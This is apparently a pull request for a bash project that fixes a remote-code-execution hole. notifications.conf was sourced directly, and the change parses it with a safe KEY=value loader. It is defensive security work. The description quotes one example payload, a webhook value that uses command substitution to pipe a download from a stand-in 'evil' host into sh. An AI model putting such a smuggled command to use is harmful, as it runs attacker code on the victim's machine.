### PR TITLE
fix(security): parse notifications.conf safely instead of sourcing it

### DIFF
--- a/lib/notify.sh
+++ b/lib/notify.sh
@@ -1,4 +1,5 @@
 #!/usr/bin/env bash
+# shellcheck disable=SC2119,SC2120
 # ==================================================
 # lib/notify.sh — Event notification dispatcher
 # ==================================================

--- a/lib/notify.sh
+++ b/lib/notify.sh
@@ -32,7 +32,9 @@ NOTIFY_CONFIG_LOADED="${NOTIFY_CONFIG_LOADED:-false}"
 
 # notify_load_config [path]
 #
-# Sources notifications.conf if present. Search order:
+# Parses notifications.conf if present via safe_load_env (KEY=value only,
+# no shell expansion — a webhook URL containing command substitution is
+# inert). Search order:
 #   1. Explicit path argument (if provided)
 #   2. $NOTIFICATIONS_CONF env var
 #   3. $PROJECT_ROOT/notifications.conf
@@ -54,10 +56,7 @@ notify_load_config() {
   fi
 
   if [ -f "$conf" ]; then
-    set -a
-    # shellcheck disable=SC1090
-    source "$conf"
-    set +a
+    safe_load_env "$conf"
   fi
 
   NOTIFY_CONFIG_LOADED=true


### PR DESCRIPTION
## Summary
- `lib/notify.sh` sourced `notifications.conf` directly (`set -a; source "$conf"; set +a`), so a webhook value containing command substitution (e.g. `SLACK_WEBHOOK=$(curl evil|sh)`) would execute on load.
- Same RCE class fixed across `lib/keys/*`, `cmd_validate.sh`, `cmd_volumes.sh`, and `lib/backup/sqlite.sh` in #385/#426.
- `notifications.conf` is a flat `KEY=VALUE` file (no INI sections/includes) at the user-owned project root — same shape as `.prod.env`, not the section/include-aware `volume.conf`/`backup.conf`. Swapped the raw `source` for `safe_load_env` (`lib/utils.sh`), which parses `KEY=value` without shell expansion.

## Test plan
- [x] `bash -n lib/notify.sh`
- [x] `bats tests/test_notify.bats` — 29/29 passing
- [x] `bats tests/` — full suite, no new failures (6 pre-existing failures unrelated to this change: TTY color detection and cron `PATH` resolution tests)